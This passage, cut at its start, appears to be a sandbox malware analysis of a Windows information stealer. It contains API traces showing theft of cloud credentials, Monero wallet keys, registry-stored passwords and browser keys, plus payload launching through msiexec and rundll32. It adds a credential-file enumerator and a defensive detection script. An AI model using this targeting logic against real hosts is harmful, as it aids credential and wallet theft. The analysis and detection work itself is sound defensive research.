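TARGETS = [
    (".azure", "*.*", r"Azure\.azure"),
    (".aws", "*.*", r"Azure\.aws"),
    (".IdentityService", "msal.cache", r"Azure\.IdentityService"),
]


def exposed_cloud_credentials(base_dir, targets=TARGETS):
    """Return [(source_path, staging_subdir)] for every file the selection matches.

    Only the top level of each directory is listed, matching the single
    FindFirstFileA/FindNextFileA loop in the trace (assumption: no recursion).
    Matching is case-insensitive like PathMatchSpecA. Whether the sample's
    '*.*' also matches a dotless name such as 'credentials' is not visible
    in the trace; fnmatch semantics (no match) are used here, so treat a
    dotless file in these folders as possibly exposed anyway.
    """
    found = []
    for subdir, pattern, staging in targets:
        directory = os.path.join(base_dir, subdir)
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if os.path.isfile(path) and fnmatch.fnmatchcase(name.lower(), pattern.lower()):
                found.append((path, staging))
    return found


def build_constructed_profile(base_dir):
    """Create a constructed profile tree for the demo (test data only)."""
    files = {
        os.path.join(".azure", "azureProfile.json"): '{"subscriptions": []}',
        os.path.join(".azure", "msal_token_cache.bin"): "opaque-token-cache",
        os.path.join(".aws", "credentials"): "[default]\naws_access_key_id = EXAMPLE\n",
        os.path.join(".IdentityService", "msal.cache"): "opaque-msal-cache",
        os.path.join(".IdentityService", "README.txt"): "not a cache",
    }
    for rel, content in files.items():
        path = os.path.join(base_dir, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Run the selection over the constructed tree; returns (subdir, name, staging) tuples."""
    with tempfile.TemporaryDirectory() as base:
        build_constructed_profile(base)
        hits = exposed_cloud_credentials(base)
        return [
            (os.path.basename(os.path.dirname(path)), os.path.basename(path), staging)
            for path, staging in hits
        ]


if __name__ == "__main__":
    # Point this at a real profile (e.g. os.path.expanduser("~") or
    # %LOCALAPPDATA%) to see what would be collected on this host.
    for subdir, name, staging in demo():
        print(f"{subdir}\\{name}  ->  {staging}")
```

The practical takeaway is that `.azure` and `.aws` hold plaintext access tokens and long-lived keys, while `msal.cache` under `.IdentityService` is DPAPI-protected on Windows and therefore readable by the same user context the stealer runs in; after a confirmed infection, rotate the AWS keys and revoke the Azure refresh tokens rather than only changing passwords.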
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F7906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 480a25187d4d7406368eed7038ef611eef75d324a31e864135f9d2d42b712a38
                                  • Instruction ID: fdde1d04e5adb0baac57c2fe0db33ebd0026bd5d642b96c804f671b0a6908bdf
                                  • Opcode Fuzzy Hash: 480a25187d4d7406368eed7038ef611eef75d324a31e864135f9d2d42b712a38
                                  • Instruction Fuzzy Hash: D2713375900208ABCB14EFE4EC89FEEBBB8BF48700F548119F516E7284DB74A945DB61
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F731C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F7335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F734EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 05ef7274aa8ed5e8a8e47624625e31f40f2bee61e0310ce2df2669bf984dba0e
                                  • Instruction ID: 6e6cf3b4d34f6b9c1b9ffe0f511131f7cda793adb53effda68de3abc33132267
                                  • Opcode Fuzzy Hash: 05ef7274aa8ed5e8a8e47624625e31f40f2bee61e0310ce2df2669bf984dba0e
                                  • Instruction Fuzzy Hash: AD1214718001089ADB19FBA0DC52FEE7738AF54300F51C16AF51A66191EF386B4AEF53
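The three ShellExecuteEx calls above, together with the strings `/i "`, ` /passive`, `.msi`, `.dll`, `msiexec.exe` and `rundll32.exe`, are the sample's loader branch: a downloaded payload is handed to a signed Windows binary according to its extension. The detection below is an added example for this report, not code from the sample or Joe Sandbox. It runs over Sysmon-style process-creation events and flags msiexec doing a passive install of an .msi from a user-writable directory, or rundll32 loading a .dll from one. The exact command-line shapes are an assumption reconstructed from the string fragments, and the events are constructed.

```python
"""Detection for the loader branch: a dropped .msi handed to msiexec with
"/i" + "/passive", or a dropped .dll handed to rundll32.

Added example for this report, not code from the sample or Joe Sandbox.  The
command-line shapes are an assumption reconstructed from the string fragments
('/i "', ' /passive', '.dll', '.msi', the two System32 paths); the Sysmon-style
event fields and the sample events are constructed.
"""
import re

# Locations a standard user can write to; a payload launched from here by a
# Windows binary is worth a look even though the binary itself is legitimate.
USER_WRITABLE = re.compile(
    r"(?i)\\(?:AppData\\(?:Local|Roaming)|Temp|ProgramData|Users\\Public|Downloads)\\"
)
# Quoted path first so paths with spaces survive; the unquoted fallback stops
# at the first space, which is the usual limit of regex command-line parsing.
MSI_PATH = re.compile(r'(?i)"([^"]+\.msi)"|(\S+\.msi)')
DLL_PATH = re.compile(r'(?i)"([^"]+\.dll)"|(\S+\.dll)')
MSI_INSTALL = re.compile(r"(?i)(?:^|\s)/i(?:\s|$)")
MSI_PASSIVE = re.compile(r"(?i)(?:^|\s)/passive(?:\s|$)")


def _first_path(rx, cmdline):
    m = rx.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def classify_process_event(event: dict):
    """Return a finding dict for a suspicious launch, or None."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    finding = None
    if image.endswith("\\msiexec.exe"):
        payload = _first_path(MSI_PATH, cmd)
        if (payload and MSI_INSTALL.search(cmd) and MSI_PASSIVE.search(cmd)
                and USER_WRITABLE.search(payload)):
            finding = {"rule": "msiexec_passive_install_from_user_dir", "payload": payload}
    elif image.endswith("\\rundll32.exe"):
        payload = _first_path(DLL_PATH, cmd)
        if payload and USER_WRITABLE.search(payload):
            finding = {"rule": "rundll32_dll_from_user_dir", "payload": payload}
    if finding:
        # The launcher being code in a user-writable directory (here the
        # stealer itself calls ShellExecuteEx) raises confidence.
        finding["parent_in_user_dir"] = bool(
            USER_WRITABLE.search(event.get("ParentImage", "")))
    return finding


# Constructed events, not taken from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\setup.msi" /passive',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "CommandLine": r'C:\Windows\system32\rundll32.exe "C:\Users\alice\AppData\Roaming\upd.dll",Start',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "CommandLine": r"C:\Windows\system32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def run_detection(events=SAMPLE_EVENTS):
    """Classify every event and keep only the findings."""
    return [f for f in (classify_process_event(e) for e in events) if f]


if __name__ == "__main__":
    for f in run_detection():
        print(f)
```

The path check does the work here, not the binary name: msiexec and rundll32 run constantly on a healthy host, so the rule only fires when the thing they load sits where a user-mode dropper can write. Feed it real Sysmon Event ID 1 records by mapping `Image`, `CommandLine` and `ParentImage` from the event data.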
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F66280: InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                    • Part of subcall function 00F66280: StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                    • Part of subcall function 00F66280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                    • Part of subcall function 00F66280: HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
                                    • Part of subcall function 00F66280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                    • Part of subcall function 00F66280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75318
                                  • lstrlen.KERNEL32(00000000), ref: 00F7532F
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00F75364
                                  • lstrlen.KERNEL32(00000000), ref: 00F75383
                                  • lstrlen.KERNEL32(00000000), ref: 00F753AE
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: fa714348e57659209ddecee76054eb8d780928131675f6dda39779726578c5c2
                                  • Instruction ID: 1d913f325909844a9b7ccc2b12fd24c0172605d6d310a3d13f471a4cb6955613
                                  • Opcode Fuzzy Hash: fa714348e57659209ddecee76054eb8d780928131675f6dda39779726578c5c2
                                  • Instruction Fuzzy Hash: F1512F309101489BDB18FF60CD96AEE7779AF90301F518029F41E9B191EF386B46EB63
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: a127f5c22dade93880a568034b5983df98d215fbf4b5710c4ebdafac9912e9ad
                                  • Instruction ID: 22a6a6849b69f8c4cff7e89b33c3167e38c05de7a729dc8736b6b116759c3764
                                  • Opcode Fuzzy Hash: a127f5c22dade93880a568034b5983df98d215fbf4b5710c4ebdafac9912e9ad
                                  • Instruction Fuzzy Hash: 3FC1C8B59401099BCB18EF60DC89FEE7778BF94300F0085A9F51EA7141EB74AA85DF92
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F742EC
                                  • lstrcat.KERNEL32(?,016FDF28), ref: 00F7430B
                                  • lstrcat.KERNEL32(?,?), ref: 00F7431F
                                  • lstrcat.KERNEL32(?,016FCED0), ref: 00F74333
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78D90: GetFileAttributesA.KERNEL32(00000000,?,00F61B54,?,?,00F8564C,?,?,00F80E1F), ref: 00F78D9F
                                    • Part of subcall function 00F69CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D39
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F793C0: GlobalAlloc.KERNEL32(00000000,00F743DD,00F743DD), ref: 00F793D3
                                  • StrStrA.SHLWAPI(?,016FDFA0), ref: 00F743F3
                                  • GlobalFree.KERNEL32(?), ref: 00F74512
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                    • Part of subcall function 00F69AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                    • Part of subcall function 00F69AC0: LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F744A3
                                  • StrCmpCA.SHLWAPI(?,00F808D1), ref: 00F744C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F744D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00F744E5
                                  • lstrcat.KERNEL32(00000000,00F80FB8), ref: 00F744F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: a464d958360feba6ba52707e94c60645377a851efe7752d0b9f2779237c19ecb
                                  • Instruction ID: 433dce78b61df1b623e96e3895cc4d33561e0193c78e00b5c24d373d7aaf4954
                                  • Opcode Fuzzy Hash: a464d958360feba6ba52707e94c60645377a851efe7752d0b9f2779237c19ecb
                                  • Instruction Fuzzy Hash: F4718976900208A7CB14EBA0EC45FEE777CAF88300F448599F61997185DB34DB55DF92
                                  APIs
                                    • Part of subcall function 00F612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F612B4
                                    • Part of subcall function 00F612A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F612BB
                                    • Part of subcall function 00F612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F612D7
                                    • Part of subcall function 00F612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F612F5
                                    • Part of subcall function 00F612A0: RegCloseKey.ADVAPI32(?), ref: 00F612FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6134F
                                  • lstrlen.KERNEL32(?), ref: 00F6135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00F61377
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F61465
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F614EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 322ff998d6b14556422bcfc54b653ec65b1f877a55c33e80d12956b1ffb68034
                                  • Instruction ID: bd0e1413bd35d36af8dc48b6cf30222af390c483de232625e17bcd3f9169bc0b
                                  • Opcode Fuzzy Hash: 322ff998d6b14556422bcfc54b653ec65b1f877a55c33e80d12956b1ffb68034
                                  • Instruction Fuzzy Hash: 005143B1D5011997CB55FB60DC92FEE733CAF54300F4081A9B60EA2081EE346B89DBA7
                                  APIs
                                    • Part of subcall function 00F672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F6733A
                                    • Part of subcall function 00F672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F673B1
                                    • Part of subcall function 00F672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F6740D
                                    • Part of subcall function 00F672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00F67452
                                    • Part of subcall function 00F672D0: HeapFree.KERNEL32(00000000), ref: 00F67459
                                  • lstrcat.KERNEL32(00000000,00F817FC), ref: 00F67606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F67648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00F6765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F6768F
                                  • lstrcat.KERNEL32(00000000,00F81804), ref: 00F676A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F676D3
                                  • lstrcat.KERNEL32(00000000,00F81808), ref: 00F676ED
                                  • task.LIBCPMTD ref: 00F676FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
